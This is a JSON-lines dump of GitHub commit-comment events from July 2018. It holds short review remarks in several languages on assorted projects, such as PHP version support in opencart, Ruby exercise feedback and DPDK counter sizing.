{"id":"8010248877","type":"CommitCommentEvent","actor":{"login":"pea3nut"},"repo":{"name":"pea3nut/pxer-homepage"},"payload":{"comment":{"id":29814378,"position":5,"line":11,"path":"routes/md.js","commit_id":"df5586207511cd6d34f471b851ef1f9e1fc83e6e","created_at":"2018-07-24T13:41:03Z","updated_at":"2018-07-24T13:41:03Z","author_association":"OWNER","body":"What problem around underscore? @eternal-flame-AD "}},"created_at":"2018-07-24T13:41:03Z"}
{"id":"8010250446","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"the-j0k3r/GitHub-Community-Dark"},"payload":{"comment":{"id":29814381,"position":null,"line":null,"path":null,"commit_id":"d356b181dda2aa6e4c242f92c676bbdb7ac47af0","created_at":"2018-07-24T13:41:18Z","updated_at":"2018-07-24T13:41:18Z","author_association":"NONE","body":"Honestly, I think they should be left as blue (informational color), since I usually set my base color to non-blue to check everything. My usual color is green (`#6d8048`) and having the triangle that color would make it appear similar to the solved blocks."}},"created_at":"2018-07-24T13:41:18Z"}
{"id":"8010258284","type":"CommitCommentEvent","actor":{"login":"muthomidenishub"},"repo":{"name":"Tinkerdale/project-snippets"},"payload":{"comment":{"id":29814392,"position":null,"line":null,"path":null,"commit_id":"7ab9124eb4bf596f9b6734f64cfb8235ae0fdc61","created_at":"2018-07-24T13:42:34Z","updated_at":"2018-07-24T13:42:34Z","author_association":"CONTRIBUTOR","body":"The class is very basic .Kindly add more functionalities"}},"created_at":"2018-07-24T13:42:34Z"}
{"id":"8010262745","type":"CommitCommentEvent","actor":{"login":"ArtemPitov"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29814404,"position":null,"line":null,"path":null,"commit_id":"3d25cf3fb796a81f282db25bce319e2f0449028c","created_at":"2018-07-24T13:43:16Z","updated_at":"2018-07-24T13:43:16Z","author_association":"NONE","body":"But what about \"twig/twig\": \"^2.4.8\" ?\r\nComposer Twig 2 \r\n    \"require\": {\r\n        \"php\": \"^7.0\",\r\n        \"symfony/polyfill-mbstring\": \"~1.0\",\r\n        \"symfony/polyfill-ctype\": \"^1.8\"\r\n    },"}},"created_at":"2018-07-24T13:43:16Z"}
{"id":"8010265904","type":"CommitCommentEvent","actor":{"login":"marklocklear"},"repo":{"name":"marklocklear/remote_gig"},"payload":{"comment":{"id":29814414,"position":null,"line":null,"path":null,"commit_id":"5ad5ad3519d1b0adac0f4bd826f018a696d1aeac","created_at":"2018-07-24T13:43:45Z","updated_at":"2018-07-24T13:43:45Z","author_association":"OWNER","body":"This commit should fix #1 "}},"created_at":"2018-07-24T13:43:45Z"}
{"id":"8010266093","type":"CommitCommentEvent","actor":{"login":"DAmNRelentless"},"repo":{"name":"oiad/communityLocalizations"},"payload":{"comment":{"id":29814415,"position":null,"line":null,"path":null,"commit_id":"7baaf642bbf3a895111929b5ca3a000c74a04b7e","created_at":"2018-07-24T13:43:47Z","updated_at":"2018-07-24T13:43:47Z","author_association":"COLLABORATOR","body":"Strings in community stringtable have to start with STR_CL"}},"created_at":"2018-07-24T13:43:47Z"}
{"id":"8010266983","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814416,"position":4,"line":4,"path":"01.rb","commit_id":"1f60db71fc669da842ba38a360dc63d2fc33b1f2","created_at":"2018-07-24T13:43:55Z","updated_at":"2018-07-24T13:43:55Z","author_association":"NONE","body":"там где используется `to_i` (или `to_f`) вызов `chomp` (`strip`) не нужен, т.к. `to_i` (или `to_f`) \"все сделает сам\"\r\n"}},"created_at":"2018-07-24T13:43:55Z"}
{"id":"8010274517","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814423,"position":10,"line":10,"path":"01.rb","commit_id":"1f60db71fc669da842ba38a360dc63d2fc33b1f2","created_at":"2018-07-24T13:45:07Z","updated_at":"2018-07-24T13:45:07Z","author_association":"NONE","body":"неточное выполнение ТЗ\r\nв ТЗ: \"после чего выводит результат пользователю на экран с обращением по имени. \" - пропущено обращение по имени )"}},"created_at":"2018-07-24T13:45:07Z"}
{"id":"8010276465","type":"CommitCommentEvent","actor":{"login":"NNNancyNing"},"repo":{"name":"NNNancyNing/hello-Nancy"},"payload":{"comment":{"id":29814428,"position":null,"line":null,"path":null,"commit_id":"0c65026a5cc991893713ad2a10f1492500000980","created_at":"2018-07-24T13:45:24Z","updated_at":"2018-07-24T13:45:24Z","author_association":"OWNER","body":"it's wrong....."}},"created_at":"2018-07-24T13:45:24Z"}
{"id":"8010276527","type":"CommitCommentEvent","actor":{"login":"DragonBuilder"},"repo":{"name":"DragonBuilder/javascript-apps-beginner"},"payload":{"comment":{"id":29814429,"position":null,"line":null,"path":null,"commit_id":"5afbd67b3cceea0a14b37885abcdd04d767d7b80","created_at":"2018-07-24T13:45:25Z","updated_at":"2018-07-24T13:45:25Z","author_association":"OWNER","body":"made the calculator look better"}},"created_at":"2018-07-24T13:45:25Z"}
{"id":"8010277258","type":"CommitCommentEvent","actor":{"login":"pooyaww"},"repo":{"name":"ARM-software/ML-KWS-for-MCU"},"payload":{"comment":{"id":29814430,"position":null,"line":null,"path":null,"commit_id":"b9ed13fc45976477743a16409a9567de0507330b","created_at":"2018-07-24T13:45:31Z","updated_at":"2018-07-24T13:45:31Z","author_association":"NONE","body":"`arm_status arm_convolve_HWC_q7_basic_nonsquare` is needed for DS_CNN, I cannot compiled without this function. Did you remove it mistakenly ? @navsuda "}},"created_at":"2018-07-24T13:45:31Z"}
{"id":"8010277861","type":"CommitCommentEvent","actor":{"login":"btunnadine"},"repo":{"name":"btunnadine/UnityFBXExporter"},"payload":{"comment":{"id":29814432,"position":null,"line":null,"path":null,"commit_id":"d8c2c27172bf26d27fda70565071f44981a56e84","created_at":"2018-07-24T13:45:37Z","updated_at":"2018-07-24T13:45:37Z","author_association":"OWNER","body":"I'm not sure what you mean about it breaking the materials. \r\n\r\nIt saves out a copy of each material (procedural and non-procedural). It will change the references of the objects in the scene to the newly created materials, which may not be desired; lines  503-518 of `FBXExporter.cs` handle this, and removing it will make the new model (and model prefab in unity) reference the new materials, but keep the scene references as they were. I've since removed these lines, as it keeps the saved model as a snapshot of the current model and doesn't generate new materials when i need to change them again.\r\n\r\nI did just re-check and it saves correctly with my models/materials/textures that i generate, but not with the ones generated with the \"Create object with Procedural Texture\" helper. I believe this is due to changing the way the texture names are saved (I use the names of the textures, it was previously `material_shaderKeyword` [lines 675/676]), using either \"unnamed\" or the previous naming convention seems to save the textures/materials correctly. Is it possible this is the the problem you were having?\r\n\r\nAs a side note: I believe there was some issue with my modelling software picking up the textures, which is what prompted the re-name. I'm not sure what the root cause was, but I kept the simple direct `material.name`/`texture.name` name references to make it easier to trace. I also helped when looking for the correct textures in my project.\r\n\r\nSorry for the delay, it has been a while since I looked at this as well."}},"created_at":"2018-07-24T13:45:37Z"}
{"id":"8010279084","type":"CommitCommentEvent","actor":{"login":"NullCGT"},"repo":{"name":"NullCGT/SpliceHack"},"payload":{"comment":{"id":29814433,"position":null,"line":null,"path":null,"commit_id":"4376e4f09e5fd53b65575d3f78286fc51109dde0","created_at":"2018-07-24T13:45:47Z","updated_at":"2018-07-24T13:45:47Z","author_association":"OWNER","body":"Unfortunately. Thanks for bringing it to my attention!"}},"created_at":"2018-07-24T13:45:47Z"}
{"id":"8010280019","type":"CommitCommentEvent","actor":{"login":"bdistler83"},"repo":{"name":"bdistler83/code-louisville-"},"payload":{"comment":{"id":29814436,"position":null,"line":null,"path":null,"commit_id":"8ed62c17a1340f04d630dd17a12e57c0ebb4fabd","created_at":"2018-07-24T13:45:55Z","updated_at":"2018-07-24T13:45:55Z","author_association":"OWNER","body":"<h2>Custom CSS Classes</h2>\r\n<ul>\r\n<li>.footer</li>\r\n         - This class has a fixed position, width to span the whole page, dark gray background color, white text, \r\n         and center aligned.\r\n<li>.background</li>\r\n        - Simply set to change the background to a light gray. \r\n<li>img</li>\r\n        - border-radius making the images on the page a circle look. \r\n<li>.about, .services, .month, and .contact</li>\r\n        - used text align to center.\r\n<li>.contact and .services</li>\r\n        - used list-style-type set to none to remove bullets\r\n\r\n<h3>CSS classes for the JS email form</h3>\r\n<li>div#eform</li> \r\n \r\n         -- margin top & bottom, padding top & bottom used to center and space the info inside the form \r\n         -- text align used to center text\r\n         -- border-radius rounding off the corners of the border\r\n         -- border and box-shadow create the border and gave it a shadow\r\n         -- width to span the form across the bottom of the page making it more noticeable\r\n         -- background-color to give it a little bit different color\r\n<li>input[type=\"submit\"]\r\n\r\n        -- width was used to make the button span across the container more\r\n        -- padding was used to give the buttons text some space\r\n        -- background color changed the button to a shade of gold\r\n        -- border used to highlight the button \r\n        -- font-size and weight make the font bigger and more noticeable\r\n        -- cursor used to change arrow to a pointer\r\n        -- border radius rounding the button\r\n<li>textarea</li>\r\n\r\n        -- width to span the container and height to make larger\r\n        -- border to make the text boxes more visible\r\n        -- padding, margin bottom & top to give them some spacing between each text box.\r\n        -- resize so that nothing is resized \r\n<li>input[type=\"text\"]</li>\r\n\r\n        -- width and height make the text area larger and more visible\r\n        -- margin top & bottom, padding to give the text some room \r\n        -- border to help it stand out\r\n<li>label</li>\r\n\r\n        -- font-size change the size of the text for name and email\r\n<li>mlabel</li>\r\n\r\n        -- font-size to make sure the font matches name and email \r\n        -- margin bottom is to help center the message label with the text area. \r\n<li>hr</li>\r\n\r\n        -- margin-top gives some space between the contact colmn\r\n        -- background-color to change the color of the back ground\r\n\r\n<h2>Customer JavaScript functions</h2> \r\n        -- The JavaScript I built for the Email form \r\n\r\n\r\n"}},"created_at":"2018-07-24T13:45:55Z"}
{"id":"8010282689","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29814443,"position":145,"line":192,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T13:46:19Z","updated_at":"2018-07-24T13:46:19Z","author_association":"NONE","body":"All our SoCs that support DPDK are 64-bit. So I don't see issue to assume atomic increment for 64-bit counters,\r\nTo be universal maybe it is possible to define counter size accordingly with CPU architecture (like ssize_t)"}},"created_at":"2018-07-24T13:46:19Z"}
{"id":"8010291364","type":"CommitCommentEvent","actor":{"login":"aksonov"},"repo":{"name":"aksonov/react-native-router-flux"},"payload":{"comment":{"id":29814459,"position":21,"line":117,"path":"src/Router.js","commit_id":"bf9cd0ec09c8011ea59af25996b497d43d9c3368","created_at":"2018-07-24T13:47:37Z","updated_at":"2018-07-24T13:47:37Z","author_association":"OWNER","body":"It uses prettierrc already.\n\n> On 24 Jul 2018, at 15:36, Davis Z. Cabral <notifications@github.com> wrote:\n> \n> Yes - the rule of thumb here is disable all formatting eslint rules to avoid conflicting with prettier. \n> \n> Make sure your prettier settings is using the .prettierrc too.\n> \n> -\n> Davis Cabral\n> \n> > On 24 Jul 2018, at 10:33, Pavel Aksonov <notifications@github.com> wrote:\n> > \n> > I’m trying… Is there any way to setup prettier to match these rules? Or could we change eslint rules to follow prettier? I have VSCode with pretty simple prettier setup...\n> > \n> > > 24 июля 2018 г., в 15:28, Davis Z. Cabral <notifications@github.com> написал(а):\n> > > \n> > > You might get rid of this now ^ - right?\n> > > \n> > > —\n> > > You are receiving this because you authored the thread.\n> > > Reply to this email directly, view it on GitHub <https://github.com/aksonov/react-native-router-flux/commit/bf9cd0ec09c8011ea59af25996b497d43d9c3368#commitcomment-29814216>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABQpcS8HiSggCjqZ5Ky6lBxfeJXqwJuNks5uJyDngaJpZM4VcvUf>.\n> > > \n> > \n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub, or mute the thread.\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-24T13:47:37Z"}
{"id":"8010291990","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814472,"position":1,"line":1,"path":"02.rb","commit_id":"0229de03ea5af1c89a729467429edc71ed9ccd00","created_at":"2018-07-24T13:47:43Z","updated_at":"2018-07-24T13:47:43Z","author_association":"NONE","body":"\"навороченное\" решение ))\r\nглавное не слишком увлекаться усложнением решений, чаще всего это ухудшает читаемость кода )"}},"created_at":"2018-07-24T13:47:43Z"}
{"id":"8010294453","type":"CommitCommentEvent","actor":{"login":"milcsix"},"repo":{"name":"byteball/flight-delays-oracle"},"payload":{"comment":{"id":29814477,"position":null,"line":null,"path":null,"commit_id":"2b5dc4228431baac8c36974f8dec46b5d3b3626e","created_at":"2018-07-24T13:48:05Z","updated_at":"2018-07-24T13:48:05Z","author_association":"NONE","body":"Does the oracle posts data if the flight is cancelled?"}},"created_at":"2018-07-24T13:48:05Z"}
{"id":"8010295017","type":"CommitCommentEvent","actor":{"login":"vothang311"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29814481,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T13:48:10Z","updated_at":"2018-07-24T13:48:10Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-24T13:48:10Z"}
{"id":"8010297586","type":"CommitCommentEvent","actor":{"login":"hferreiro"},"repo":{"name":"brave/muon"},"payload":{"comment":{"id":29814488,"position":14,"line":1370,"path":"patches/master_patch.patch","commit_id":"3e3d703a710f6c9cb8b6636ab4a4e898ae5f0ef7","created_at":"2018-07-24T13:48:32Z","updated_at":"2018-07-24T13:48:32Z","author_association":"COLLABORATOR","body":"I used a pure virtual method as you suggested in https://github.com/brave/muon/pull/618#discussion_r203475492. I just did very informal testing but it works as expected as it doesn't do any functional change."}},"created_at":"2018-07-24T13:48:32Z"}
{"id":"8010297886","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29814489,"position":40,"line":658,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6369c668207e5acada1dfa3edba54112ccbd05c9","created_at":"2018-07-24T13:48:35Z","updated_at":"2018-07-24T13:48:35Z","author_association":"COLLABORATOR","body":"They don't use it like our \"Hülasa, buraya gelmek için..\" hülasa but hulasa qılmaq means özetlemek, so maybe i should put that in as a seperate entry?"}},"created_at":"2018-07-24T13:48:35Z"}
{"id":"8010302003","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"EngineHub/CraftBook"},"payload":{"comment":{"id":29814493,"position":null,"line":null,"path":null,"commit_id":"532422ae3742e1001ba3c8855a5da6491e9e55d7","created_at":"2018-07-24T13:49:13Z","updated_at":"2018-07-24T13:49:13Z","author_association":"MEMBER","body":"@mibby These builds don’t work at all yet"}},"created_at":"2018-07-24T13:49:13Z"}
{"id":"8010304352","type":"CommitCommentEvent","actor":{"login":"olantwin"},"repo":{"name":"ShipSoft/FairShip"},"payload":{"comment":{"id":29814497,"position":null,"line":null,"path":null,"commit_id":"bc609362da7c3c8b3ca020d7f08ff40d0dbbe7e1","created_at":"2018-07-24T13:49:35Z","updated_at":"2018-07-24T13:49:35Z","author_association":"CONTRIBUTOR","body":"Could you try inverting x? I suspect the RPC people were using a different definition of x. We'll fix it asap."}},"created_at":"2018-07-24T13:49:35Z"}
{"id":"8010304434","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29814498,"position":40,"line":658,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"6369c668207e5acada1dfa3edba54112ccbd05c9","created_at":"2018-07-24T13:49:36Z","updated_at":"2018-07-24T13:49:36Z","author_association":"COLLABORATOR","body":"Ah cool that sounds good\n\nOn Tue, Jul 24, 2018, 4:48 PM koguzhan <notifications@github.com> wrote:\n\n> They don't use it like our \"Hülasa, buraya gelmek için..\" hülasa but\n> hulasa qılmaq means özetlemek, so maybe i should put that in as a seperate\n> entry?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/6369c668207e5acada1dfa3edba54112ccbd05c9#commitcomment-29814489>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2ju44TYLnvlAmmzZ18ksrNDtndtEks5uJyWzgaJpZM4VcuDe>\n> .\n>\n"}},"created_at":"2018-07-24T13:49:36Z"}
{"id":"8010306440","type":"CommitCommentEvent","actor":{"login":"Kaooot"},"repo":{"name":"TheAmyChan98/EnderGames"},"payload":{"comment":{"id":29814503,"position":null,"line":null,"path":null,"commit_id":"f866d6b1b90937086e630461af286edb74c20ba9","created_at":"2018-07-24T13:49:55Z","updated_at":"2018-07-24T13:49:55Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-24T13:49:55Z"}
{"id":"8010307338","type":"CommitCommentEvent","actor":{"login":"munepi"},"repo":{"name":"Yasunari15/MacTeX-Uninstaller"},"payload":{"comment":{"id":29814506,"position":null,"line":null,"path":null,"commit_id":"086682a29303fc3ab3a48ca761abd049e55cd6c9","created_at":"2018-07-24T13:50:05Z","updated_at":"2018-07-24T13:50:05Z","author_association":"NONE","body":"@Yasunari15 さん、\r\n\r\n> これを拡張してRepositoryを作らせて頂いてもよろしいでしょうか。\r\n\r\nはい、`bibunsho7-patch/artwork/Build-icns.sh` をどうぞお使いください。\r\nあの `Build-icns.sh` は icns ファイルを作るための備忘録みたいなもんなんで :-) \r\n\r\n> 是非，MacTeX Uninstallerもご覧ください。\r\n\r\nどうもご紹介をありがとうございます。\r\nわたしも同uninstallerを作ってもよかったんですけど、そこまで動機づけが湧きませんでした :D \r\nM○cTeXのｱﾚ（MacTeX Directory Structureもそうですが、とくにpkgのpost script）をまともにしたいなーと思いつつつも動機づけがなくて、何かの機会にやはりupstream側に働きかけたいです。"}},"created_at":"2018-07-24T13:50:05Z"}
{"id":"8010312353","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29814520,"position":2,"line":2,"path":"Lesson_2/2_numbers_5.rb","commit_id":"04609350aa95b60f40e0a634355acbd70aa2c85e","created_at":"2018-07-24T13:50:52Z","updated_at":"2018-07-24T13:50:52Z","author_association":"NONE","body":"А зачем тут блок? step(5) вернет Range элементов от 10 до 100 и осталось просто их конвертировать в массив."}},"created_at":"2018-07-24T13:50:52Z"}
{"id":"8010312930","type":"CommitCommentEvent","actor":{"login":"PeterStudioWeb"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29814523,"position":null,"line":null,"path":null,"commit_id":"3d25cf3fb796a81f282db25bce319e2f0449028c","created_at":"2018-07-24T13:50:57Z","updated_at":"2018-07-24T13:50:57Z","author_association":"NONE","body":"Оn the majority of hostings there is no PHP 5.x but only PHP 7.x"}},"created_at":"2018-07-24T13:50:57Z"}
{"id":"8010314147","type":"CommitCommentEvent","actor":{"login":"rootsco"},"repo":{"name":"makingsensetraining/DirectlyTraining"},"payload":{"comment":{"id":29814525,"position":5,"line":5,"path":"webapp/app/components/pages/ActionButtons/ModalBody.jsx","commit_id":"b2fbe723d1baf1ce969bb09a20a0ac0c36cb0122","created_at":"2018-07-24T13:51:09Z","updated_at":"2018-07-24T13:51:09Z","author_association":"COLLABORATOR","body":"Is there any reason why the file name does not match the component name?\r\n\r\nModalBody.js should export ModalBody component. would be clearer.\r\n\r\nconsider the following examples\r\n\r\n`import MsModal from './ModalBody';` \r\n\r\nagainst\r\n\r\n`import ModalBody from './ModalBody';`\r\n\r\n"}},"created_at":"2018-07-24T13:51:09Z"}
{"id":"8010314322","type":"CommitCommentEvent","actor":{"login":"shaman2007"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29814526,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T13:51:10Z","updated_at":"2018-07-24T13:51:10Z","author_association":"NONE","body":"This is a great project"}},"created_at":"2018-07-24T13:51:10Z"}
{"id":"8010315373","type":"CommitCommentEvent","actor":{"login":"akngs"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29814528,"position":185,"line":185,"path":"chaewon0917/20180724_Regular_Expression.md","commit_id":"68c0c36094cf47d84173c5cf23db8c320329be0b","created_at":"2018-07-24T13:51:19Z","updated_at":"2018-07-24T13:51:19Z","author_association":"NONE","body":"방금 집에 와서 찾아보니 KSC-5601 한글코드는 김대중 정권(1998년대)보다 10년 전인 1987년에 한국 표준으로 제안되었다고 해요."}},"created_at":"2018-07-24T13:51:19Z"}
{"id":"8010317503","type":"CommitCommentEvent","actor":{"login":"KnowOne134"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29814541,"position":null,"line":null,"path":null,"commit_id":"b163f8336e2c3a358c2ecd3503e3d4983c51dcd1","created_at":"2018-07-24T13:51:39Z","updated_at":"2018-07-24T13:51:39Z","author_association":"CONTRIBUTOR","body":"Saw it was gonna add it tonight. Stayed up an extra hour lastnight to make these changes"}},"created_at":"2018-07-24T13:51:39Z"}
{"id":"8010317991","type":"CommitCommentEvent","actor":{"login":"jizusun"},"repo":{"name":"Maverobot/maverobot.github.io"},"payload":{"comment":{"id":29814548,"position":null,"line":null,"path":null,"commit_id":"861ffb5a2e3effd82dfd320155c175c9595bddd2","created_at":"2018-07-24T13:51:44Z","updated_at":"2018-07-24T13:51:44Z","author_association":"NONE","body":"路过点赞 🙌"}},"created_at":"2018-07-24T13:51:44Z"}
{"id":"8010318242","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29814552,"position":null,"line":null,"path":null,"commit_id":"735011518ff72a7b3c4910fdfae3d80fa539c0da","created_at":"2018-07-24T13:51:46Z","updated_at":"2018-07-24T13:51:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-170](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-170).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-170-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-24T13:51:46Z"}
{"id":"8010318276","type":"CommitCommentEvent","actor":{"login":"ekoshkin"},"repo":{"name":"JetBrains/teamcity-cloudformation-template"},"payload":{"comment":{"id":29814553,"position":420,"line":296,"path":"teamcity-server.yaml","commit_id":"42cd2396b75543a84b4aa9378accabba8eda32ef","created_at":"2018-07-24T13:51:46Z","updated_at":"2018-07-24T13:51:46Z","author_association":"MEMBER","body":"looks like it is true\r\nwill fix it\r\nthank you for pointing to the issue"}},"created_at":"2018-07-24T13:51:46Z"}
{"id":"8010320635","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29814562,"position":185,"line":185,"path":"chaewon0917/20180724_Regular_Expression.md","commit_id":"68c0c36094cf47d84173c5cf23db8c320329be0b","created_at":"2018-07-24T13:52:09Z","updated_at":"2018-07-24T13:52:09Z","author_association":"CONTRIBUTOR","body":"방금 집에 와서 찾아보니 KSC-5601 한글코드는 김대중 정권(1998년대)보다 10년 전인 1987년에 한국 표준으로 제안되었다고 해요."}},"created_at":"2018-07-24T13:52:09Z"}
{"id":"8010329296","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29814574,"position":null,"line":null,"path":null,"commit_id":"01b8db29243dab6f57cdac3749719ea474cfa4ad","created_at":"2018-07-24T13:53:26Z","updated_at":"2018-07-24T13:53:26Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-197](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-197).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-197-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-24T13:53:26Z"}
{"id":"8010330147","type":"CommitCommentEvent","actor":{"login":"ThomasRuf"},"repo":{"name":"ShipSoft/FairShip"},"payload":{"comment":{"id":29814578,"position":null,"line":null,"path":null,"commit_id":"bc609362da7c3c8b3ca020d7f08ff40d0dbbe7e1","created_at":"2018-07-24T13:53:33Z","updated_at":"2018-07-24T13:53:33Z","author_association":"CONTRIBUTOR","body":"this looks better\r\n![image](https://user-images.githubusercontent.com/7068505/43142810-8abbb82e-8f59-11e8-9e70-c69ebd698d35.png)\r\n"}},"created_at":"2018-07-24T13:53:33Z"}
{"id":"8010335929","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29814585,"position":2,"line":2,"path":"Lesson_2/2_numbers_5.rb","commit_id":"04609350aa95b60f40e0a634355acbd70aa2c85e","created_at":"2018-07-24T13:54:25Z","updated_at":"2018-07-24T13:54:25Z","author_association":"NONE","body":"И не нужно создавать пустой массив."}},"created_at":"2018-07-24T13:54:25Z"}
{"id":"8010336890","type":"CommitCommentEvent","actor":{"login":"JoshClose"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29814586,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-24T13:54:34Z","updated_at":"2018-07-24T13:54:34Z","author_association":"NONE","body":"Is this something that you would merge in? I can see why you wouldn't want it readily available. My default was to try `IPAddress.Any` 'cause I didn't know any better, so that might be something you'd want to stop.\r\n\r\nMaybe you can make it an explicit add and that you shouldn't be doing it by default.\r\n- If `IPAddress.Any` is passed into `AddPacketHandler` don't add it. It might be a good idea to just throw an exception here. I would suggest doing this anyways, as it was confusing to have it just be silent. Maybe the logs spit something out that I didn't see though.\r\n- Have a separate method called `AddUnsafeCatchAllPacketHandler` or something that makes it explicit that you shouldn't be doing it, that doesn't accept an `IPAddress` and will only add `Any`. You can put a nice lengthy XML doc description on why you shouldn't be using it."}},"created_at":"2018-07-24T13:54:34Z"}
{"id":"8010338101","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29814591,"position":null,"line":null,"path":null,"commit_id":"afd0f5fb6211b6aebd21391562a47d3dda671bb9","created_at":"2018-07-24T13:54:44Z","updated_at":"2018-07-24T13:54:44Z","author_association":"NONE","body":"Other development tools offer a more complete set of software build targets, don't they?"}},"created_at":"2018-07-24T13:54:44Z"}
{"id":"8010342303","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29814598,"position":17,"line":17,"path":"Lesson_2/5_leap_year.rb","commit_id":"04609350aa95b60f40e0a634355acbd70aa2c85e","created_at":"2018-07-24T13:55:19Z","updated_at":"2018-07-24T13:55:19Z","author_association":"NONE","body":"да, круто! Можно еще day передать аргументом в sum"}},"created_at":"2018-07-24T13:55:19Z"}
{"id":"8010343010","type":"CommitCommentEvent","actor":{"login":"csirelia"},"repo":{"name":"csirelia/DS-Algorithm"},"payload":{"comment":{"id":29814600,"position":null,"line":null,"path":null,"commit_id":"b667aad1383a57926ee08cb56daf3b9b46ce8e48","created_at":"2018-07-24T13:55:25Z","updated_at":"2018-07-24T13:55:25Z","author_association":"OWNER","body":"给定目标值target，每一种面值的货币对应有n个，求最少需要多少个货币"}},"created_at":"2018-07-24T13:55:25Z"}
{"id":"8010344253","type":"CommitCommentEvent","actor":{"login":"OrdinaryMagician"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29814605,"position":null,"line":null,"path":null,"commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T13:55:36Z","updated_at":"2018-07-24T13:55:36Z","author_association":"OWNER","body":"Well, I've been attempting to follow your suggestions, but now the whole damn thing is segfaulting and I have no idea why."}},"created_at":"2018-07-24T13:55:36Z"}
{"id":"8010346789","type":"CommitCommentEvent","actor":{"login":"ArtemPitov"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29814614,"position":null,"line":null,"path":null,"commit_id":"3d25cf3fb796a81f282db25bce319e2f0449028c","created_at":"2018-07-24T13:55:58Z","updated_at":"2018-07-24T13:55:58Z","author_association":"NONE","body":"Many web hostings still use 5.6, I even saw 5.2 "}},"created_at":"2018-07-24T13:55:58Z"}
{"id":"8010352543","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814629,"position":7,"line":7,"path":"02.rb","commit_id":"0229de03ea5af1c89a729467429edc71ed9ccd00","created_at":"2018-07-24T13:56:50Z","updated_at":"2018-07-24T13:56:50Z","author_association":"NONE","body":"\"чомп\" здесь в общем-то не нужен, Float сам отрежет перенос строки"}},"created_at":"2018-07-24T13:56:50Z"}
{"id":"8010358474","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"oiad/communityLocalizations"},"payload":{"comment":{"id":29814688,"position":null,"line":null,"path":null,"commit_id":"7baaf642bbf3a895111929b5ca3a000c74a04b7e","created_at":"2018-07-24T13:57:44Z","updated_at":"2018-07-24T13:57:44Z","author_association":"COLLABORATOR","body":"I missed that, thank you."}},"created_at":"2018-07-24T13:57:44Z"}
